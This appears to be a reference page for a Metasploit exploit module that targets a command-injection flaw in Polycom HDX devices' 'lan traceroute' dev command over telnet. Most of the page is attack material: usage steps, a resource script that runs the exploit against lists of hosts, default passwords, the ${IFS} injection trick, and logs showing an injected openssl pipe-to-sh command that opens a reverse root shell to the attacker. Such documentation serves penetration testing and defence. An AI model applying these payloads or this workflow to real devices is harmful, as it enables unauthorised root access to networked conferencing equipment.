Polycom Shell HDX Series Traceroute Command Execution - Metasploit


This page contains detailed information about how to use the exploit/unix/misc/polycom_hdx_traceroute_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Polycom Shell HDX Series Traceroute Command Execution
Module: exploit/unix/misc/polycom_hdx_traceroute_exec
Source code: modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb
Disclosure date: 2017-11-12
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): 23
List of CVEs: -

Within Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows for an attacker to execute arbitrary payloads with telnet or openssl.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using polycom_hdx_traceroute_exec against a single host

Normally, you can use exploit/unix/misc/polycom_hdx_traceroute_exec this way:

msf > use exploit/unix/misc/polycom_hdx_traceroute_exec
msf exploit(polycom_hdx_traceroute_exec) > show targets
    ... a list of targets ...
msf exploit(polycom_hdx_traceroute_exec) > set TARGET target-id
msf exploit(polycom_hdx_traceroute_exec) > show options
    ... show and set options ...
msf exploit(polycom_hdx_traceroute_exec) > exploit

Using polycom_hdx_traceroute_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your polycom_hdx_traceroute_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/misc/polycom_hdx_traceroute_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Within Polycom HDX series devices, there is a command execution vulneralbility in one of the dev commands devcmds, lan traceroute which subtituing $() or otherwise similiar operand , similiar to polycom_hdx_auth_bypass could allow for an attacker to obtain a command shell. Spaces must be replaced with #{IFS} aka Internal Field Seperator

Vulnerable Application


Tested on the latest and greatest version of the firmware, vendor has not patched since being reported. Found here

Options


PASSWORD

Although a majority of devices come without a password, occasionally when one is required, you can set one to either the default 456, admin, or POLYCOM, or the devices.

Payloads


Supported payloads include the telnet payload cmd/unix/reverse but not cmd/unix/reverse_ssl_double_telnet Alternatively, cmd/unix/reverse_openssl can be used or, your own choice of executing any arbitary command with cmd/unix/generic

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)

Verification Steps


A successful check of the exploit will look like this:
msf exploit(polycom) > set RHOST 192.168.0.17 RHOST => 192.168.0.17 msf exploit(polycom) > set LHOSt ens3 LHOSt => ens3 msf exploit(polycom) > set LPORT 3511 LPORT => 3511 msf exploit(polycom) > show payloads

Compatible Payloads


Name Disclosure Date Rank Description


cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet) cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl) cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)

msf exploit(polycom) > set PAYLOAD cmd/unix/reverse PAYLOAD => cmd/unix/reverse msf exploit(polycom) > set VERBOSE false VERBOSE => false msf exploit(polycom) > run

[] Started reverse TCP double handler on 192.168.0.11:3511 [+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent! [+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:34874... [] Accepted the first client connection... [] Accepted the second client connection... [] Command: echo vGopPRp0jBxt4J2D; [] Writing to socket A [] Writing to socket B [] Reading from sockets... [] Reading from socket B [] B: "vGopPRp0jBxt4J2D\n" [] Matching... [] A is input... [] Command shell session 10 opened (192.168.0.11:3511 -> 192.168.0.17:37687) at 2017-11-15 10:29:58 -0500 [*] 192.168.0.17:23 - Shutting down payload stager listener...

id uid=0(root) gid=0(root) whoami root

Debugging


Setting VERBOSE to true should yield an output of.

msf exploit(polycom) > set VERBOSE true
VERBOSE => true
rmsf exploit(polycom) > run

[*] Started reverse TCP double handler on 192.168.0.11:3511
[*] 192.168.0.17:23 - Received : !
Polycom Command Shell
XCOM host:    localhost port: 4121
TTY name:     /dev/pts/6
Session type: telnet
2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: freeing conn [conn: 0x1266f300] [sock: 104] [thread: 0x12559e68]
2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: SessionHandler: freeing session 4340
2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession(sess: 4340)
2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession current open sessions count= 9
2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:main_server_thread: new connection [conn: 0x1266f300] [sock: 104]
2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: new conn [conn: 0x1266f300] [sock: 104] [thread: 0x1255a010] [TID: 3380]
2017-11-15 15:33:12 DEBUG avc: pc[0]: uimsg: [R: telnet /tmp/apiasynclisteners/psh6 /dev/pts/6]
2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession(type: telnet sess: 4342)
2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession current open sessions count= 10
2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: register_api_session pSession=0x12669918
2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: about to call sendJavaMessageEx
2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: session 4342 registered

[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent!
[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:37450...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo WD3QloY3fys6n7dK;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] 192.168.0.17:23 - devcmds
Entering sticky internal commands *ONLY* mode...
lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh`
2017-11-15 15:33:13 DEBUG avc: pc[0]: uimsg: [D: lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh`]
2017-11-15 15:33:13 DEBUG avc: pc[0]: os: task:DETR pid:3369 thread 4e5ff4c0 11443 12660c68
2017-11-15 15:33:14 INFO avc: pc[0]: DevMgrEther: Trace Route Command Entry, hostnameORIP: `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh` hop_count: 0

[*] Reading from socket B
[*] B: "WD3QloY3fys6n7dK\n"
[*] Matching...
[*] A is input...
[*] Command shell session 11 opened (192.168.0.11:3511 -> 192.168.0.17:38624) at 2017-11-15 10:34:23 -0500
[*] 192.168.0.17:23 - Shutting down payload stager listener...

id
uid=0(root) gid=0(root)
whoami
root

Go back to menu.

Msfconsole Usage


Here is how the unix/misc/polycom_hdx_traceroute_exec exploit module looks in the msfconsole:

msf6 > use exploit/unix/misc/polycom_hdx_traceroute_exec

[*] Using configured payload cmd/unix/reverse
msf6 exploit(unix/misc/polycom_hdx_traceroute_exec) > show info

       Name: Polycom Shell HDX Series Traceroute Command Execution
     Module: exploit/unix/misc/polycom_hdx_traceroute_exec
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-11-12

Provided by:
  Mumbai
  staaldraad
  Paul Haas <[email protected]>
  h00die <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  Yes

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  CBHOST                     no        The listener address used for staging the final payload
  CBPORT                     no        The listener port used for staging the final payload
  PASSWORD                   no        Password to access console interface if required.
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     23               yes       The target port (TCP)

Payload information:
  Space: 8000

Description:
  Within Polycom command shell, a command execution flaw exists in lan 
  traceroute, one of the dev commands, which allows for an attacker to 
  execute arbitrary payloads with telnet or openssl.

References:
  https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/

Module Options


This is a complete list of options available in the unix/misc/polycom_hdx_traceroute_exec exploit:

msf6 exploit(unix/misc/polycom_hdx_traceroute_exec) > show options

Module options (exploit/unix/misc/polycom_hdx_traceroute_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CBHOST                     no        The listener address used for staging the final payload
   CBPORT                     no        The listener port used for staging the final payload
   PASSWORD                   no        Password to access console interface if required.
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     23               yes       The target port (TCP)

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the unix/misc/polycom_hdx_traceroute_exec exploit:

msf6 exploit(unix/misc/polycom_hdx_traceroute_exec) > show advanced

Module advanced options (exploit/unix/misc/polycom_hdx_traceroute_exec):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/misc/polycom_hdx_traceroute_exec module can exploit:

msf6 exploit(unix/misc/polycom_hdx_traceroute_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/misc/polycom_hdx_traceroute_exec exploit:

msf6 exploit(unix/misc/polycom_hdx_traceroute_exec) > show payloads

Compatible Payloads
===================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   1  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   2  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   3  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   4  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

Evasion Options


Here is the full list of possible evasion options supported by the unix/misc/polycom_hdx_traceroute_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/misc/polycom_hdx_traceroute_exec) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Failed to connect to target service


Here is a relevant code snippet related to the "<PEER> - Failed to connect to target service" error message:

63:	    Exploit::CheckCode::Unknown
64:	  end
65:	
66:	  def exploit
67:	    unless check == Exploit::CheckCode::Detected
68:	      fail_with(Failure::Unknown, "#{peer} - Failed to connect to target service")
69:	    end
70:	
71:	    #
72:	    # Obtain banner information
73:	    #

<PEER> - Please supply a password to authenticate with


Here is a relevant code snippet related to the "<PEER> - Please supply a password to authenticate with" error message:

77:	    vprint_status("Received #{banner.length} bytes from service")
78:	    vprint_line("#{banner}")
79:	    if banner =~ /password/i
80:	      print_status("Authentication enabled on device, authenticating with target...")
81:	      if datastore['PASSWORD'].nil?
82:	        print_error("#{peer} - Please supply a password to authenticate with")
83:	        return
84:	      end
85:	      # couldnt find where to enable auth in web interface or telnet...but according to other module it exists..here in case.
86:	      sock.put("#{datastore['PASSWORD']}\n")
87:	      res = sock.get_once

<PEER> - Invalid credentials for target.


Here is a relevant code snippet related to the "<PEER> - Invalid credentials for target." error message:

86:	      sock.put("#{datastore['PASSWORD']}\n")
87:	      res = sock.get_once
88:	      if res =~ /Polycom/
89:	        print_good("#{peer} - Authenticated successfully with target.")
90:	      elsif res =~ /failed/
91:	        print_error("#{peer} - Invalid credentials for target.")
92:	        return
93:	      end
94:	    elsif banner =~ /Polycom/ # praise jesus
95:	      print_good("#{peer} - Device has no authentication, excellent!")
96:	    end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Mumbai
  • staaldraad
  • Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>
  • h00die <[email protected]>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.